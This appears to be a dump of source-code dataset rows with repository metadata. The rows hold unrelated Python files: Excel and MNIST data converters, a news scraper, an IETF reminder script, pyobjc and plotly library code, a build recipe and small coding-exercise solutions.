    ips.sort(key=lambda x: (x['net'], x['sortkey']))

    for ip in ips:
        if ip['net'] == 'ipv6':
            print('[%s]:%i' % (ip['ip'], ip['port']))
        else:
            print('%s:%i' % (ip['ip'], ip['port']))

if __name__ == '__main__':
    main()
|
[
"[email protected]"
] | |
f886c22e0fbc3e0a268193239c53656c2954fcc7
|
c54f5a7cf6de3ed02d2e02cf867470ea48bd9258
|
/pyobjc/pyobjc-core/Lib/objc/_category.py
|
acfb9a48e26e38dd13712137c8517c88b442e532
|
[
"MIT"
] |
permissive
|
orestis/pyobjc
|
01ad0e731fbbe0413c2f5ac2f3e91016749146c6
|
c30bf50ba29cb562d530e71a9d6c3d8ad75aa230
|
refs/heads/master
| 2021-01-22T06:54:35.401551 | 2009-09-01T09:24:47 | 2009-09-01T09:24:47 | 16,895 | 8 | 5 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,372 |
py
|
__all__ = ['classAddMethod', 'Category']
from _objc import selector, classAddMethods, objc_class, ivar
from types import FunctionType, MethodType
def classAddMethod(cls, name, method):
    """
    Add a single method to a class. 'name' is the ObjC selector
    """
    if isinstance(method, selector):
        # Already a selector object: rebuild it under the requested selector
        # name, preserving its signature and class-method flag.
        sel = selector(method.callable,
                       selector=name,
                       signature=method.signature,
                       isClassMethod=method.isClassMethod)
    else:
        # Plain Python callable: wrap it in a selector with the default
        # signature inferred by the bridge.
        sel = selector(method, selector=name)

    return classAddMethods(cls, [sel])
#
# Syntactic support for categories
#
class _CategoryMeta(type):
    """
    Meta class for categories: instead of creating a new type, __new__
    injects the class body's methods and attributes into the existing
    Objective-C class and returns that class.
    """
    __slots__ = ()
    # Names injected by the class machinery that must not be copied onto
    # the target Objective-C class.
    _IGNORENAMES = ('__module__', '__name__', '__doc__')

    def _newSubclass(cls, name, bases, methods):
        # Plain type.__new__, used by Category() to build the helper base
        # class without triggering the injection logic in __new__ below.
        return type.__new__(cls, name, bases, methods)
    _newSubclass = classmethod(_newSubclass)

    def __new__(cls, name, bases, methods):
        if len(bases) != 1:
            raise TypeError("Cannot have multiple inheritance with Categories")

        # The real Objective-C class was stashed on the helper base class
        # by Category().
        c = bases[0].real_class

        if c.__name__ != name:
            raise TypeError("Category name must be same as class name")

        # Split the class body into callables (added as ObjC methods) and
        # plain attributes (set directly on the class).
        m = [ x[1] for x in methods.iteritems() if x[0] not in cls._IGNORENAMES and isinstance(x[1], (FunctionType, MethodType, selector, classmethod))]
        vars = [ x for x in methods.iteritems() if x[0] not in cls._IGNORENAMES and not isinstance(x[1], (FunctionType, MethodType, selector, classmethod))]
        for k, v in vars:
            if isinstance(v, ivar):
                raise TypeError("Cannot add instance variables in a Category")

        classAddMethods(c, m)
        for k, v in vars:
            setattr(c, k, v)
        return c
def Category(cls):
    """
    Create a category on ``cls``.

    Usage:
        class SomeClass (Category(SomeClass)):
            def method(self):
                pass

    ``SomeClass`` is an existing class that will be rebound to the same
    value. The side-effect of this class definition is that the methods
    in the class definition will be added to the existing class.
    """
    if not isinstance(cls, objc_class):
        raise TypeError, "Category can only be used on Objective-C classes"
    # Build a throwaway base class carrying the target in 'real_class';
    # _CategoryMeta.__new__ picks it up when the category body is defined.
    retval = _CategoryMeta._newSubclass('Category', (), dict(real_class=cls))
    return retval
|
[
"ronaldoussoren@f55f28a5-9edb-0310-a011-a803cfcd5d25"
] |
ronaldoussoren@f55f28a5-9edb-0310-a011-a803cfcd5d25
|
ab81aec92b4137221d359ec9b7ddacf88e47a00b
|
81e008b746f89d144066ee5589fafa370f37e5a5
|
/1005.py
|
8bf880a472d0444a295f1fb678435685f4c44eb9
|
[] |
no_license
|
osmarsalesjr/SolucoesUriOnlineJudgeEmPython3
|
5c43fb37608ff3d8ff042d94e6b897f4b1d6afb9
|
5de3fa39483fd4ff409efa5981e65daba7744809
|
refs/heads/master
| 2021-01-01T06:40:51.938732 | 2017-08-30T21:46:39 | 2017-08-30T21:46:39 | 97,482,585 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 175 |
py
|
def main():
    """Read two exam scores from stdin and print their weighted average
    (weights 3.5 and 7.5, divided by 11) with five decimal places."""
    first_score = float(input())
    second_score = float(input())
    weighted_average = ((first_score * 3.5) + (second_score * 7.5)) / 11
    print("MEDIA = %.5f" % weighted_average)


if __name__ == '__main__':
    main()
|
[
"[email protected]"
] | |
594f7ee6ba623887c47dbde85e653e5183136971
|
f9886d2b57d92186773d73f59dc0a0e9759b8944
|
/04_bigdata/02_Standardization_Analysis/2.Excel/10_excel_column_by_name_all_worksheets.py
|
c9fc988e32e973138146a52d7b0e7546d7aca05f
|
[] |
no_license
|
Meengkko/bigdata_python2019
|
14bab0da490bd36c693f50b5d924e27f4a8e02ba
|
a28e964ab7cefe612041830c7b1c960f92c42ad5
|
refs/heads/master
| 2022-12-12T15:51:21.448923 | 2019-11-08T03:50:15 | 2019-11-08T03:50:15 | 195,142,241 | 0 | 0 | null | 2022-04-22T22:37:59 | 2019-07-04T00:17:18 |
HTML
|
UTF-8
|
Python
| false | false | 1,894 |
py
|
# Purpose: select specific columns (by resolving header names to column
# indexes) from every worksheet of an Excel file and write them to a new one.

# Library imports
import sys
from datetime import date
from xlrd import open_workbook, xldate_as_tuple
from xlwt import Workbook

# Input/output paths taken from command-line arguments
input_file = sys.argv[1]  # sales_2013.xlsx
output_file = sys.argv[2]  # output_files/10_output_basic.xls

# Create the output workbook and its single worksheet
output_workbook = Workbook()
output_worksheet = output_workbook.add_sheet('selected_columns_all_worksheets')

# Header names of the columns to keep
my_columns = ['Customer Name', 'Sale Amount']
first_worksheet = True

# Open the input workbook and copy the selected columns from every worksheet
with open_workbook(input_file) as workbook:
    data = [my_columns]
    index_of_cols_to_keep = []
    for worksheet in workbook.sheets():
        if first_worksheet:
            # Resolve the wanted header names to column indexes once,
            # using the first worksheet's header row.
            header = worksheet.row_values(0)
            for column_index in range(len(header)):
                if header[column_index] in my_columns:
                    index_of_cols_to_keep.append(column_index)
            first_worksheet = False
        # Copy the kept columns of every data row (row 0 is the header).
        for row_index in range(1, worksheet.nrows):
            row_list = []
            for column_index in index_of_cols_to_keep:
                cell_value = worksheet.cell_value(row_index, column_index)
                cell_type = worksheet.cell_type(row_index, column_index)
                if cell_type == 3:
                    # Cell type 3 is a date: convert Excel's serial date
                    # value to mm/dd/YYYY text.
                    date_cell = xldate_as_tuple(cell_value, workbook.datemode)
                    date_cell = date(*date_cell[0:3]).strftime('%m/%d/%Y')
                    row_list.append(date_cell)
                else:
                    row_list.append(cell_value)
            data.append(row_list)
    # Write the accumulated rows (header first) to the output worksheet.
    for list_index, output_list in enumerate(data):
        for element_index, element in enumerate(output_list):
            output_worksheet.write(list_index, element_index, element)
output_workbook.save(output_file)
|
[
"[email protected]"
] | |
e831918416256c25927fb1be5c435b8555f05dc6
|
577a40ff1c84d28b88a9ade84d265587d28ed2a3
|
/0707/02.py
|
1c05cbec1dfbd4eeaecf48ec375bcfb73a53d48c
|
[] |
no_license
|
bosl95/MachineLearning_Note
|
b167c182fcf5186f6466b8b062cde83b076b0b04
|
934714c5a62e4864f2b5338153c3aaeb3363abe9
|
refs/heads/master
| 2022-12-06T20:58:20.457567 | 2020-09-05T16:18:11 | 2020-09-05T16:18:11 | 279,835,223 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,580 |
py
|
# Convert the MNIST binary label/image files into a CSV (label, 784 pixel
# values per row), dumping the first few images as PGM for inspection.
import struct

name = 'train'
maxdata = 1000
path = 'mnist/'

lbl_f = open(path + name + '-labels-idx1-ubyte', 'rb')  # training label file (binary)
img_f = open(path + name + '-images-idx3-ubyte', 'rb')  # training image file (binary)
csv_f = open(path + name + '.csv', 'w', encoding='utf-8')

# Read magic number and record count from the label file (two big-endian uint32s).
mag, lbl_count = struct.unpack('>II', lbl_f.read(8))
print(lbl_count)

# Read magic number and image count from the image file.
mag, img_count = struct.unpack('>II', img_f.read(8))
print(mag)
print(img_count)

# Read image height (rows) and width (cols) from the image file.
row, col = struct.unpack('>II', img_f.read(8))
print(row)
print(col)

px = row * col  # number of bytes in a single image

res = []  # NOTE(review): never used — candidate for removal
for idx in range(lbl_count):
    if idx > maxdata:  # stop once maxdata is exceeded
        # NOTE(review): '>' lets indices 0..maxdata through, i.e.
        # maxdata+1 records — confirm whether '>=' was intended.
        break
    label = struct.unpack("B", lbl_f.read(1))[0]  # read one label byte from the label file
    bdata = img_f.read(px)  # read one image's worth of bytes from the image file
    sdata = list(map(lambda n: str(n), bdata))
    # print(sdata)
    csv_f.write(str(label) + ',')
    csv_f.write(','.join(sdata) + '\r\n')
    if idx < 10:  # optional: dump the first 10 images as PGM files for visual inspection
        s = 'P2 28 28 255\n'
        s += ' '.join(sdata)
        iname = path + '{0}-{1}-{2}.pgm'.format(name, idx, label)
        with open(iname, 'w', encoding='utf-8') as f:
            f.write(s)

csv_f.close()
lbl_f.close()
img_f.close()
|
[
"[email protected]"
] | |
369183498068e8e4659aa370fd0efa60b8a6ebd1
|
72316a1d1a2e0358486d50aeecbac8219ccdf092
|
/ietf/bin/send-milestone-reminders
|
9ed5d254f74bbac1e2488cb1549dcb81cb5f4510
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
algby/ietfdb
|
363541941bd6e806bed70891bed4c7f47c9f0539
|
9ff37e43abbecac873c0362b088a6d9c16f6eed2
|
refs/heads/master
| 2021-01-16T18:57:50.100055 | 2014-09-29T21:16:55 | 2014-09-29T21:16:55 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,566 |
#!/usr/bin/env python
#
# This script will send various milestone reminders. It's supposed to
# be run daily, and will then send reminders weekly/monthly as
# appropriate.
import datetime, os
import syslog
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ietf.settings")
syslog.openlog(os.path.basename(__file__), syslog.LOG_PID, syslog.LOG_LOCAL0)
from ietf.group.mails import *
today = datetime.date.today()
MONDAY = 1
FIRST_DAY_OF_MONTH = 1
if today.isoweekday() == MONDAY:
# send milestone review reminders - ideally we'd keep track of
# exactly when we sent one last time for a group, but it's a bit
# complicated because people can change the milestones in the mean
# time, so dodge all of this by simply sending once a week only
for g in groups_with_milestones_needing_review():
mail_sent = email_milestone_review_reminder(g, grace_period=7)
if mail_sent:
syslog.syslog("Sent milestone review reminder for %s %s" % (g.acronym, g.type.name))
early_warning_days = 30
# send any milestones due reminders
for g in groups_needing_milestones_due_reminder(early_warning_days):
email_milestones_due(g, early_warning_days)
syslog.syslog("Sent milestones due reminder for %s %s" % (g.acronym, g.type.name))
if today.day == FIRST_DAY_OF_MONTH:
# send milestone overdue reminders - once a month
for g in groups_needing_milestones_overdue_reminder(grace_period=30):
email_milestones_overdue(g)
syslog.syslog("Sent milestones overdue reminder for %s %s" % (g.acronym, g.type.name))
|
[
"[email protected]@7b24d068-2d4e-4fce-9bd7-cbd2762980b0"
] |
[email protected]@7b24d068-2d4e-4fce-9bd7-cbd2762980b0
|
|
8d4e01d63f029ae4f6264c3ec8a2b1b51bacfbc6
|
0fa51edef92cd07033e7d03aa441ae54d8edad2e
|
/news_scrapers/epu_scrapy/spiders/deredactie_spider.py
|
f7aab7c2ba79b7d300fec7f911dcf631998cb515
|
[] |
no_license
|
Datafable/epu-index
|
d86fc108f7e8591cb949fde78f490fd970654bde
|
3f9d24448ff85a8ea6736dbf9da0ec954a3b224b
|
refs/heads/master
| 2020-12-25T18:13:53.397154 | 2018-03-28T09:37:53 | 2018-03-28T09:37:53 | 35,040,805 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,835 |
py
|
import scrapy
from scrapy.contrib.spiders import CrawlSpider
from scrapy.exceptions import CloseSpider
from epu_scrapy.items import Article
from datetime import datetime, timedelta
from time import strptime, strftime, mktime
import re
import json
import os
def set_start_urls(settings):
"""
Based on the dates given in the settings file, construct the start urls for the spider
"""
term = settings['term']
if type(settings['period']) is not dict:
today = datetime.today()
if settings['period'] != 'yesterday':
CloseSpider("unknown period setting. See the scrapers README for more information.")
search_day = today - timedelta(days=1) # search for articles of yesterday
search_day_str = '{0}/{1}/{2}'.format(search_day.day, search_day.month, search_day.year % 100)
start_urls = ['http://deredactie.be/cm/vrtnieuws/1.516538?text={0}&type=text&range=atdate&isdate={1}&sort=date&action=submit&advancedsearch=on'.format(term, search_day_str)]
else:
start = datetime(*strptime(settings['period']['start'], '%Y-%m-%d')[:6]) # awkward syntax to convert struct time to datetime (see: http://stackoverflow.com/questions/1697815/how-do-you-convert-a-python-time-struct-time-object-into-a-datetime-object)
start_str = '{0}/{1}/{2}'.format(start.day, start.month, start.year % 100)
end = datetime(*strptime(settings['period']['end'], '%Y-%m-%d')[:6])
end_str = '{0}/{1}/{2}'.format(end.day, end.month, end.year % 100)
start_urls = ['http://deredactie.be/cm/vrtnieuws/1.516538?text={0}&type=text&range=betweendate&startdate={1}&enddate={2}&sort=date&action=submit&advancedsearch=on'.format(term, start_str, end_str)]
return start_urls
class DeredactieSpider(CrawlSpider):
name = 'deredactie' # name of the spider, to be used when running from command line
allowed_domains = ['deredactie.be']
settings = json.load(open(os.path.join(os.path.dirname(os.path.dirname(__file__)), 'crawling_settings.json')))
start_urls = set_start_urls(settings)
def parse(self, response):
"""
Parse the first search page to determine the number of articles returned. Use the urls offset parameter
to iterate over all response pages and yield scrapy.Request objects that will be parsed with the
parse_list_page function
"""
nr_of_articles_element = response.xpath('//li[contains(concat(" ", normalize-space(@class), " "), " searchcounter ")]')
if len(nr_of_articles_element) is 2:
# nr of articles is mentioned above list of articles and below. So the number of elements that match the xpath selector is 2
nr_of_articles_text = ''.join(nr_of_articles_element[0].xpath('descendant-or-self::*/text()').extract())
# Explaining the regular expression at line 53:
# (?P<offset>\d+) => matches a number (\d+) and assigns it to group "offset"
# (?P<pagesize>\d+) => matches a number (\d+) and assigns it to group "pagesize"
# \s+van\s+ => matches the word "van" surrounded by whitespace (spaces, tabs etc)
# (?P<nr_of_articles>\d+) => matches a number (\d+) and assigns it to group "nr_of_articles"
m = re.search('(?P<offset>\d+)-(?P<pagesize>\d+)\s+van\s+(?P<nr_of_articles>\d+)', nr_of_articles_text)
if m:
pagesize = int(m.group('pagesize')) - int(m.group('offset')) + 1
nr_of_articles = int(m.group('nr_of_articles'))
for i in range(0, nr_of_articles, pagesize):
# Note that the offset parameter starts at 0
yield scrapy.Request(self.start_urls[0] + '&offset={0}'.format(i), callback=self.parse_list_page)
else:
raise scrapy.exceptions.CloseSpider('Could not parse number of articles from {0}'.format(response.url))
else:
raise scrapy.exceptions.CloseSpider('Element containing the number of articles was not found at {0}'.format(response.url))
def parse_published_datetime(self, datetime_element_parts):
"""
Helper method to parse a datetime from a html element
"""
datetime_str_parts = [x.encode('utf-8') for x in datetime_element_parts]
datetime_str = ' '.join(datetime_str_parts).strip()
datetime_str_stripped = re.findall('[0-9]+/[0-9]+/[0-9]+[^0-9]+[0-9]+:[0-9]+', datetime_str)[0]
dt = datetime(*strptime(datetime_str_stripped, '%d/%m/%Y - %H:%M')[0:6])
return dt.isoformat()
def parse_list_page(self, response):
"""
Parse a single page returned by the search query. Find all links referring to articles and yield
scrapy.Request objects for every link found. The parsing of these links is done by the parse_article
function.
"""
print response.url
links = response.xpath('//div[contains(concat(" ", normalize-space(@class), " "), " searchresults ")]/descendant::a/@href').extract()
link_set = set([x.encode('utf-8') for x in links])
for l in link_set:
if l != '#':
# an article link can point to a single article page, or a storyline page, which includes several articles.
# in both cases, the id of the actual article that is pointed to can be found in the url. In the case
# of a storyline, the url is like /cm/vrtnieuws/buitenland/<storylineid>?eid=<articleid> while for a
# single article page, the url is /cm/vrtnieuws/binnenland/<articleid>. Both a storylineid and a articleid
# look something like 1.193019, which will be matched by the regular expression pattern [0-9.]+
article_id = re.findall('[0-9.]+', l)[-1] # the last string that matches this pattern in the url is the article id
l = 'http://deredactie.be/cm/' + article_id
yield scrapy.Request(l, callback=self.parse_article)
def parse_article(self, response):
"""
Parse the article content page
"""
# search for article title
title_parts = response.xpath('//div[@id="articlehead"]/h1/text()').extract()
if len(title_parts) > 0:
title = ' '.join(set(title_parts)).encode('utf-8').strip()
else:
title = ''
# search for article published date
datetime_element_parts = response.xpath('//small[@id="pubdate"]/strong/text()').extract()
if len(datetime_element_parts) > 0:
datetime_iso_str = self.parse_published_datetime(datetime_element_parts)
else:
datetime_iso_str = ''
# search for article intro text
article_intro_parts = response.xpath('//div[@id="intro"]/strong/text()').extract()
article_intro = ' '.join([x.strip() for x in article_intro_parts]).strip()
# search for article full text
article_full_text_fragments = response.xpath('//div[@id="articlebody"]/descendant::p/descendant-or-self::*/text()').extract()
article_full_text = ' '.join([x.strip() for x in article_full_text_fragments]).strip()
# reconstruct the url to the nicely rendered page
url_parts = response.url.split('/')
article_id = url_parts.pop()
url_parts.append('vrtnieuws')
url_parts.append(article_id)
url = '/'.join(url_parts)
# now create an Article item, and return it. All Articles created during scraping can be written to an output file when the -o option is given.
article = Article()
article['url'] = url
article['intro'] = article_intro
article['title'] = title
article['published_at'] = datetime_iso_str
article['text'] = article_full_text
return article
|
[
"[email protected]"
] | |
5bf6d8e5da9416d75daaa4e067ae7119ca58f647
|
c2c6798ced0db33b2669f11f2434596c61496aef
|
/fastparquet/__init__.py
|
38dec432f8c525661a842f3d0a7c473b1fa9f2e3
|
[
"Apache-2.0"
] |
permissive
|
PGryllos/fastparquet
|
e037b0d5e6387746f82e91fd9b4240962f178308
|
07401c501dbfc55c456052413f0c904483c68b50
|
refs/heads/master
| 2020-04-04T19:09:27.392744 | 2018-10-24T18:31:06 | 2018-10-24T18:31:06 | 156,194,372 | 0 | 0 |
Apache-2.0
| 2018-11-05T09:46:52 | 2018-11-05T09:46:52 | null |
UTF-8
|
Python
| false | false | 424 |
py
|
"""parquet - read parquet files."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from .thrift_structures import parquet_thrift
from .core import read_thrift
from .writer import write
from . import core, schema, converted_types, api
from .api import ParquetFile
from .util import ParquetException
__version__ = "0.1.6"
|
[
"[email protected]"
] | |
2f0a611da567bf2a6e1eedcb7042f1a475d9f211
|
d89a482aaf3001bbc4515f39af9ba474e1ae6062
|
/ubertool/exposure_output.py
|
4a6a41f37b05e878207260f2803b50a2a59f17da
|
[] |
no_license
|
hongtao510/u_tool
|
2925e3694aba81714cf83018c3f8520a7b503228
|
98c962cfb1f53c4971fb2b9ae22c882c0fae6497
|
refs/heads/master
| 2021-01-10T20:40:24.793531 | 2014-03-14T22:57:37 | 2014-03-14T22:57:37 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,183 |
py
|
import os
os.environ['DJANGO_SETTINGS_MODULE']='settings'
import webapp2 as webapp
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.ext.webapp import template
from google.appengine.api import users
from google.appengine.ext import db
import cgi
import cgitb
cgitb.enable()
import datetime
from ubertool.exposure import Exposure
import logging
class UbertoolExposureConfigurationPage(webapp.RequestHandler):
def post(self):
logger = logging.getLogger("UbertoolExposureConfigurationPage")
form = cgi.FieldStorage()
config_name = str(form.getvalue('config_name'))
user = users.get_current_user()
q = db.Query(Exposure)
q.filter('user =',user)
q.filter("config_name =", config_name)
exposure = q.get()
if exposure is None:
exposure = Exposure()
if user:
logger.info(user.user_id())
exposure.user = user
exposure.config_name = config_name
exposure.cas_number = str(form.getvalue('cas_number'))
exposure.formulated_product_name = form.getvalue('formulated_product_name')
exposure.met_file = form.getvalue('metfile')
exposure.przm_scenario = form.getvalue('PRZM_scenario')
exposure.exams_environment_file = form.getvalue('EXAMS_environment_file')
exposure.application_method = form.getvalue('application_mathod')
exposure.app_type = form.getvalue('app_type')
exposure.weight_of_one_granule = float(form.getvalue('weight_of_one_granule'))
exposure.wetted_in = bool(form.getvalue('wetted_in'))
exposure.incorporation_depth = float(form.getvalue('incorporation_depth'))
exposure.application_kg_rate = float(form.getvalue('application_kg_rate'))
exposure.application_lbs_rate = float(form.getvalue('application_lbs_rate'))
exposure.application_rate_per_use = float(form.getvalue('application_rate_per_use'))
logger.info(form.getvalue("application_date"))
#TODO This is NASTY we should consider using Date Chooser or something with only one valid output
app_data = form.getvalue('application_date')
app_data_parts = app_data.split("-")
exposure.application_date = datetime.date(int(app_data_parts[0]),int(app_data_parts[1]),int(app_data_parts[2]))
exposure.interval_between_applications = float(form.getvalue('interval_between_applications'))
exposure.application_efficiency = float(form.getvalue('application_efficiency'))
exposure.percent_incorporated = float(form.getvalue('percent_incorporated'))
exposure.spray_drift = float(form.getvalue('spray_drift'))
exposure.runoff = float(form.getvalue('runoff'))
exposure.one_in_ten_peak_exposure_concentration = float(form.getvalue('one_in_ten_peak_exposure_concentration'))
exposure.one_in_ten_four_day_average_exposure_concentration = float(form.getvalue('one_in_ten_four_day_average_exposure_concentration'))
exposure.one_in_ten_twentyone_day_average_exposure_concentration = float(form.getvalue('one_in_ten_twentyone_day_average_exposure_concentration'))
exposure.one_in_ten_sixty_day_average_exposure_concentration = float(form.getvalue('one_in_ten_sixty_day_average_exposure_concentration'))
exposure.one_in_ten_ninety_day_average_exposure_concentration = float(form.getvalue('one_in_ten_ninety_day_average_exposure_concentration'))
exposure.maximum_peak_exposure_concentration = float(form.getvalue('maximum_peak_exposure_concentration'))
exposure.maximum_four_day_average_exposure_concentration = float(form.getvalue('maximum_four_day_average_exposure_concentration'))
exposure.maximum_twentyone_day_average_exposure_concentration = float(form.getvalue('maximum_twentyone_day_average_exposure_concentration'))
exposure.maximum_sixty_day_average_exposure_concentration = float(form.getvalue('maximum_sixty_day_average_exposure_concentration'))
exposure.maximum_ninety_day_average_exposure_concentration = float(form.getvalue('maximum_ninety_day_average_exposure_concentration'))
exposure.pore_water_peak_exposure_concentration = float(form.getvalue('pore_water_peak_exposure_concentration'))
exposure.pore_water_four_day_average_exposure_concentration = float(form.getvalue('pore_water_four_day_average_exposure_concentration'))
exposure.pore_water_twentyone_day_average_exposure_concentration = float(form.getvalue('pore_water_twentyone_day_average_exposure_concentration'))
exposure.pore_water_sixty_day_average_exposure_concentration = float(form.getvalue('pore_water_sixty_day_average_exposure_concentration'))
exposure.pore_water_ninety_day_average_exposure_concentration = float(form.getvalue('pore_water_ninety_day_average_exposure_concentration'))
exposure.frac_pest_surface = float(form.getvalue('frac_pest_surface'))
exposure.put()
self.redirect("aquatic_toxicity.html")
app = webapp.WSGIApplication([('/.*', UbertoolExposureConfigurationPage)], debug=True)
def main():
run_wsgi_app(app)
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
b0853a9aba65d24c4142d61fcce38fcedb426468
|
2420a09930fcc1a0d3c67a0791be70ddee418f4a
|
/Kth_Largest_Element_in_an_Array.py
|
d08f8e38b151d423cded627522ff355833c7db5b
|
[] |
no_license
|
Superbeet/LeetCode
|
eff8c2562fb5724b89bc2b05ab230a21b67a9e5a
|
a1b14fc7ecab09a838d70e0130ece27fb0fef7fd
|
refs/heads/master
| 2020-04-06T03:34:10.973739 | 2018-02-13T00:57:06 | 2018-02-13T00:57:06 | 42,485,335 | 4 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,727 |
py
|
# Use Bubble k times - Time Complexity: O(nk)
class Solution3(object):
def findKthLargest(self, nums, k):
if not nums:
return None
size = len(nums)
for i in xrange(0, k):
for j in xrange(0, size-1-i):
if nums[j]>nums[j+1]:
nums[j],nums[j+1] = nums[j+1], nums[j]
return nums[-k]
# Time complexity: O(k + (n-k)Logk) <~> O(nlogk)
import heapq
class MinHeap(object):
def __init__(self, k):
self.k = k
self.data = []
def push(self, element):
if len(self.data)<self.k:
heapq.heappush(self.data, element)
else:
if element>self.data[0]:
heapq.heapreplace(self.data, element)
def pop(self):
return heapq.heappop(self.data)
class Solution(object):
def findKthLargest(self, nums, k):
"""
:type nums: List[int]
:type k: int
:rtype: int
"""
if not nums:
return None
size = len(nums)
heap = MinHeap(k)
for i in xrange(0, size):
heap.push(nums[i])
return heap.pop()
# Time: O(n+klogn)
class MaxHeap(object):
def __init__(self, k):
self.k = k
self.data = []
def push(self, element):
element = -element
if len(self.data)<self.k:
heapq.heappush(self.data, element)
else:
if element>self.data[0]:
heapq.heapreplace(self.data, element)
def pop(self):
return -heapq.heappop(self.data)
class Solution2(object):
def findKthLargest(self, nums, k):
if not nums:
return None
size = len(nums)
heap = MaxHeap(size)
for i in xrange(0, size):
heap.push(nums[i])
for j in xrange(k-1):
heap.pop()
return heap.pop()
sol = Solution()
sol2 = Solution2()
sol3 = Solution3()
nums = [3,2,1,5,6,4,11,8,7]
print sol.findKthLargest(nums, 2)
print sol2.findKthLargest(nums, 2)
print sol3.findKthLargest(nums, 2)
|
[
"[email protected]"
] | |
cea8f85549e20e56b361532625210c10df856781
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2818/60900/249172.py
|
7ab8f518b83de81d5c00a7ebae67bc19775a6307
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 470 |
py
|
str1 = input()
str2 = input()
data1 = str1.split(" ")
chapter = str2.split(" ")
subject = (int)(data1[0])
time = (int)(data1[1])
total = 0
temp = 0
index = 0
while len(chapter)!=0:
temp = (int)(chapter[0])*time
index = 0
for i in range (0,len(chapter)):
if(temp>(int)(chapter[i])*time):
temp = (int)(chapter[i])*time
index = i
total = total+temp
del chapter[index]
if time!=1:
time = time-1
print(total)
|
[
"[email protected]"
] | |
c73ec83d2bc16f0e985a6026dd20b6c6936d08f1
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_95/2212.py
|
d949b82062698cadca5cf074e35b0245522ff71b
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 797 |
py
|
test_input1 = 'ejp mysljylc kd kxveddknmc re jsicpdrysi'
test_input2 = 'rbcpc ypc rtcsra dkh wyfrepkym veddknkmkrkcd'
test_input3 = 'de kr kd eoya kw aej tysr re ujdr lkgc jv'
test_output1 = 'our language is impossible to understand'
test_output2 = 'there are twenty six factorial possibilities'
test_output3 = 'so it is okay if you want to just give up'
mapping = {}
for (x, y) in zip(test_input1, test_output1):
mapping[x] = y
for (x, y) in zip(test_input2, test_output2):
mapping[x] = y
for (x, y) in zip(test_input3, test_output3):
mapping[x] = y
mapping['q'] = 'z'
mapping['z'] = 'q'
ntc = int(raw_input())
for i in xrange(0, ntc):
sentence = list(raw_input())
for j in xrange(0, len(sentence)):
sentence[j] = mapping[sentence[j]]
print 'Case #%d: %s'%(i+1, "".join(sentence))
|
[
"[email protected]"
] | |
35e250ddb36f9bda71a9edb9402cff3dc7b06ecd
|
1b9075ffea7d4b846d42981b41be44238c371202
|
/tags/2007-EOL/applications/multimedia/xsane/actions.py
|
a5dcf88f3f4b48317cf764f6179f90f66eb3cf6d
|
[] |
no_license
|
pars-linux/contrib
|
bf630d4be77f4e484b8c6c8b0698a5b34b3371f4
|
908210110796ef9461a1f9b080b6171fa022e56a
|
refs/heads/master
| 2020-05-26T20:35:58.697670 | 2011-07-11T11:16:38 | 2011-07-11T11:16:38 | 82,484,996 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,280 |
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Licensed under the GNU General Public License, version 2.
# See the file http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
from pisi.actionsapi import autotools
from pisi.actionsapi import pisitools
from pisi.actionsapi import shelltools
from pisi.actionsapi import get
def setup():
pisitools.dosed("src/xsane.h", "# include \"lcms.h\"", "# include \"lcms/lcms.h\"")
shelltools.export("CXXFLAGS", "%s -I/usr/include/lcms" % get.CXXFLAGS())
shelltools.export("LDFLAGS", "%s -L/usr/lib -llcms" % get.LDFLAGS())
autotools.configure("--enable-gtk2 \
--enable-nls \
--enable-jpeg \
--enable-png \
--enable-tiff \
--enable-gimp \
--enable-lcms \
--disable-sanetest \
--disable-gimptest \
--disable-gtktest")
def build():
autotools.make()
def install():
autotools.install()
# Make xsane symlink. Now, it is seen as a plugin in gimp.
pisitools.dosym("/usr/bin/xsane", "/usr/lib/gimp/2.0/plug-ins/xsane")
pisitools.dodoc("xsane.*")
pisitools.removeDir("/usr/sbin")
|
[
"[email protected]"
] | |
1697c0111932a0c9cad342f698ed370b0c72284d
|
a46d135ba8fd7bd40f0b7d7a96c72be446025719
|
/packages/python/plotly/plotly/validators/histogram/_outsidetextfont.py
|
91c57eed75e3073c405ed483e18e2d95722ed640
|
[
"MIT"
] |
permissive
|
hugovk/plotly.py
|
5e763fe96f225d964c4fcd1dea79dbefa50b4692
|
cfad7862594b35965c0e000813bd7805e8494a5b
|
refs/heads/master
| 2022-05-10T12:17:38.797994 | 2021-12-21T03:49:19 | 2021-12-21T03:49:19 | 234,146,634 | 0 | 0 |
MIT
| 2020-01-15T18:33:43 | 2020-01-15T18:33:41 | null |
UTF-8
|
Python
| false | false | 1,566 |
py
|
import _plotly_utils.basevalidators
class OutsidetextfontValidator(_plotly_utils.basevalidators.CompoundValidator):
def __init__(
self, plotly_name="outsidetextfont", parent_name="histogram", **kwargs
):
